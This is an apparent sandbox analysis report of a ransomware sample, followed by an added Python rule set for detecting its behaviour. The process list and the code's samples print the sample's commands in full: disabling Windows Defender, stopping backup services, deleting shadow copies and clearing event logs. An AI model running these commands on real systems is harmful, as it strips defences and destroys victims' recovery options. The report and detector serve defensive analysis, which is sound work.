Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 432 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1304 wrote to memory of 2800 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1304 wrote to memory of 2800 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1304 wrote to memory of 2800 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 3476 wrote to memory of 2308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3476 wrote to memory of 2308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3476 wrote to memory of 2308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 3940 wrote to memory of 2660 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3940 wrote to memory of 2660 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3940 wrote to memory of 2660 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1436 wrote to memory of 2184 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1436 wrote to memory of 2184 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1436 wrote to memory of 2184 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 3972 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3972 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3972 wrote to memory of 912 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 4080 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 4080 wrote to memory of 1656 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4080 wrote to memory of 1656 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4080 wrote to memory of 1656 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 3912 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3912 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3912 wrote to memory of 2848 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 3396 wrote to memory of 3872 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3396 wrote to memory of 3872 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3396 wrote to memory of 3872 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 608 wrote to memory of 620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 608 wrote to memory of 620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 608 wrote to memory of 620 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe
PID 432 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe

"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "vmicvss" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UnistoreSvc_12b50" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12b50" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UnistoreSvc_12b50" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\auw1_HOW_TO_DECRYPT.txt
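
The process list above is one defense-evasion and recovery-inhibition chain: stop and disable VSS and backup services, neuter Defender through policy keys, service Start values, ETW autologgers, scheduled tasks and Set-MpPreference, remove its definitions, delete shadow copies, clear the System, Security and Application logs, then open the note. The following is an added example, not part of the sandbox output, that runs process command lines through a small rule set, maps hits to ATT&CK techniques, and returns a verdict for the host. The command lines in SAMPLE_CMDLINES are copied from this report plus one constructed benign line; the rule set, the backup-service list and the verdict thresholds are the editor's own and are the part to tune.

```python
"""Rule-based triage of process command lines for the service-stop, Defender
tamper, shadow-copy deletion and log-clearing chain recorded above.
Added example; rules and thresholds are the editor's, not the sandbox's."""
import re
from collections import defaultdict

# Services whose stop/disable removes a local recovery path (VSS, Windows Backup).
BACKUP_SERVICES = {"vss", "vmicvss", "wbengine", "sdrsvc"}
DEFENDER_SVC = r"(?:WinDefend|WdBoot|WdFilter|WdNisDrv|WdNisSvc|SecurityHealthService)"

# (rule name, ATT&CK technique, pattern). Group 1, where present, is a service name.
RULES = [
    ("shadow_copy_deletion", "T1490", re.compile(
        r'\b(?:vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete)\b', re.I)),
    ("event_log_clear", "T1070.001", re.compile(
        r'\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+\S+', re.I)),
    ("service_stop", "T1489", re.compile(
        r'\bnet1?(?:\.exe)?\s+stop\s+"?([^"\s]+)"?', re.I)),
    ("service_disable", "T1489", re.compile(
        r'\bsc(?:\.exe)?\s+config\s+"?([^"\s]+)"?\s+start=\s*disabled', re.I)),
    ("defender_policy_tamper", "T1562.001", re.compile(
        r'\breg(?:\.exe)?\s+(?:add|delete)\s+"?HKLM\\Software\\Policies\\Microsoft\\Windows Defender', re.I)),
    ("defender_service_disable", "T1562.001", re.compile(
        r'\breg(?:\.exe)?\s+add\s+"?HKLM\\System\\CurrentControlSet\\Services\\' + DEFENDER_SVC
        + r'"?\s+/v\s+"?Start"?\s.*/d\s+"?4"?', re.I)),
    ("defender_etw_logger_disable", "T1562.006", re.compile(
        r'Autologger\\Defender(?:Api|Audit)Logger"?\s+/v\s+"?Start"?\s.*/d\s+"?0"?', re.I)),
    ("defender_definitions_removed", "T1562.001", re.compile(
        r'MpCmdRun(?:\.exe)?"?\s+-RemoveDefinitions', re.I)),
    ("defender_preference_tamper", "T1562.001", re.compile(
        r'\bSet-MpPreference\s+-Disable\w+\s+\$true', re.I)),
    ("defender_task_disable", "T1562.001", re.compile(
        r'\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+"Microsoft\\Windows\\(?:Windows Defender|ExploitGuard)\\[^"]+"\s+/Disable', re.I)),
    ("ransom_note_opened", "T1486", re.compile(
        r'\bnotepad(?:\.exe)?"?\s+.*HOW_TO_DECRYPT', re.I)),
]

# Copied from the Processes section of this report; the last line is a
# constructed benign control.
SAMPLE_CMDLINES = [
    'net.exe stop "VSS" /y',
    r'C:\Windows\system32\net1 stop "wbengine" /y',
    'sc.exe config "VSS" start= disabled',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    'vssadmin.exe delete shadows /all /quiet',
    'wevtutil.exe cl security',
    'wmic.exe SHADOWCOPY /nointeractive',
    'wmic.exe shadowcopy delete',
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    r'"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\auw1_HOW_TO_DECRYPT.txt',
    'svchost.exe -k netsvcs',
]


def classify(cmdline):
    """Return [(rule, technique, service_or_None)] for one command line."""
    hits = []
    for name, technique, pattern in RULES:
        m = pattern.search(cmdline)
        if m:
            hits.append((name, technique, m.group(1) if pattern.groups else None))
    return hits


def assess(cmdlines):
    """Aggregate one host's command lines into technique coverage and a verdict."""
    rules_hit, techniques, services = defaultdict(list), set(), set()
    for cmd in cmdlines:
        for name, technique, service in classify(cmd):
            rules_hit[name].append(cmd)
            techniques.add(technique)
            if service:
                services.add(service.lower())
    backup_tamper = services & BACKUP_SERVICES
    # Recovery inhibition plus at least two other techniques is the shape of the
    # chain in this detonation; recovery inhibition alone is still worth a page.
    recovery = "shadow_copy_deletion" in rules_hit or bool(backup_tamper)
    if recovery and len(techniques) >= 3:
        verdict = "ransomware_pre_encryption_chain"
    elif recovery:
        verdict = "recovery_inhibition"
    elif rules_hit:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "techniques": sorted(techniques),
            "services_touched": sorted(services),
            "backup_services_tampered": sorted(backup_tamper), "rules": dict(rules_hit)}


if __name__ == "__main__":
    result = assess(SAMPLE_CMDLINES)
    print(result["verdict"], result["techniques"], result["backup_services_tampered"])
    for rule, cmds in result["rules"].items():
        print(f"  {rule}: {len(cmds)} event(s)")
```

Note that wmic.exe SHADOWCOPY /nointeractive on its own only enters the alias and is deliberately not matched; the deletion is the separate "wmic.exe shadowcopy delete" invocation, which is why both wmic lines appear in the report. The service rules capture the target name so that SamSs, SstpSvc, UI0Detect, WebClient and the UnistoreSvc instance still count as T1489 without being mistaken for backup tampering.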

Network

Country Destination Domain Proto
IE 52.109.76.30:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp

Files

memory/1304-115-0x0000000000000000-mapping.dmp

memory/2800-116-0x0000000000000000-mapping.dmp

memory/3476-117-0x0000000000000000-mapping.dmp

memory/2308-118-0x0000000000000000-mapping.dmp

memory/3940-119-0x0000000000000000-mapping.dmp

memory/2660-120-0x0000000000000000-mapping.dmp

memory/1436-121-0x0000000000000000-mapping.dmp

memory/2184-122-0x0000000000000000-mapping.dmp

memory/3972-123-0x0000000000000000-mapping.dmp

memory/912-124-0x0000000000000000-mapping.dmp

memory/4080-125-0x0000000000000000-mapping.dmp

memory/1656-126-0x0000000000000000-mapping.dmp

memory/3912-127-0x0000000000000000-mapping.dmp

memory/2848-128-0x0000000000000000-mapping.dmp

memory/3396-129-0x0000000000000000-mapping.dmp

memory/3872-130-0x0000000000000000-mapping.dmp

memory/608-131-0x0000000000000000-mapping.dmp

memory/620-132-0x0000000000000000-mapping.dmp

memory/884-133-0x0000000000000000-mapping.dmp

memory/3896-134-0x0000000000000000-mapping.dmp

memory/364-135-0x0000000000000000-mapping.dmp

memory/1264-136-0x0000000000000000-mapping.dmp

memory/1376-137-0x0000000000000000-mapping.dmp

memory/1780-138-0x0000000000000000-mapping.dmp

memory/3932-139-0x0000000000000000-mapping.dmp

memory/1904-140-0x0000000000000000-mapping.dmp

memory/2236-141-0x0000000000000000-mapping.dmp

memory/3108-142-0x0000000000000000-mapping.dmp

memory/3020-143-0x0000000000000000-mapping.dmp

memory/3128-144-0x0000000000000000-mapping.dmp

memory/3152-145-0x0000000000000000-mapping.dmp

memory/3952-146-0x0000000000000000-mapping.dmp

memory/3764-147-0x0000000000000000-mapping.dmp

memory/1956-148-0x0000000000000000-mapping.dmp

memory/2160-149-0x0000000000000000-mapping.dmp

memory/3884-150-0x0000000000000000-mapping.dmp

memory/2148-151-0x0000000000000000-mapping.dmp

memory/2768-152-0x0000000000000000-mapping.dmp

memory/1160-153-0x0000000000000000-mapping.dmp

memory/1184-154-0x0000000000000000-mapping.dmp

memory/2480-155-0x0000000000000000-mapping.dmp

memory/3312-156-0x0000000000000000-mapping.dmp

memory/3684-157-0x0000000000000000-mapping.dmp

memory/2676-158-0x0000000000000000-mapping.dmp

memory/1652-159-0x0000000000000000-mapping.dmp

memory/2836-160-0x0000000000000000-mapping.dmp

memory/368-161-0x0000000000000000-mapping.dmp

memory/404-162-0x0000000000000000-mapping.dmp

memory/1224-163-0x0000000000000000-mapping.dmp

memory/3936-164-0x0000000000000000-mapping.dmp

memory/2500-165-0x0000000000000000-mapping.dmp

memory/1348-166-0x0000000000000000-mapping.dmp

memory/2324-167-0x0000000000000000-mapping.dmp

memory/1836-168-0x0000000000000000-mapping.dmp

memory/4020-169-0x0000000000000000-mapping.dmp

memory/2392-170-0x0000000000000000-mapping.dmp

memory/2936-171-0x0000000000000000-mapping.dmp

memory/2380-172-0x0000000000000000-mapping.dmp

memory/3188-173-0x0000000000000000-mapping.dmp

memory/1420-174-0x0000000000000000-mapping.dmp

memory/2028-175-0x0000000000000000-mapping.dmp

memory/3736-176-0x0000000000000000-mapping.dmp

memory/3708-177-0x0000000000000000-mapping.dmp

memory/2724-178-0x0000000000000000-mapping.dmp

memory/1692-180-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/1692-179-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/1692-181-0x0000000000D80000-0x0000000000DB6000-memory.dmp

memory/1692-182-0x0000000006CD0000-0x00000000072F8000-memory.dmp

memory/1692-183-0x0000000000EA0000-0x0000000000EA1000-memory.dmp

memory/1692-184-0x0000000000EA2000-0x0000000000EA3000-memory.dmp

memory/1692-185-0x0000000006B10000-0x0000000006B32000-memory.dmp

memory/1692-186-0x0000000007300000-0x0000000007366000-memory.dmp

memory/1692-187-0x0000000007450000-0x00000000074B6000-memory.dmp

memory/1692-188-0x00000000074C0000-0x0000000007810000-memory.dmp

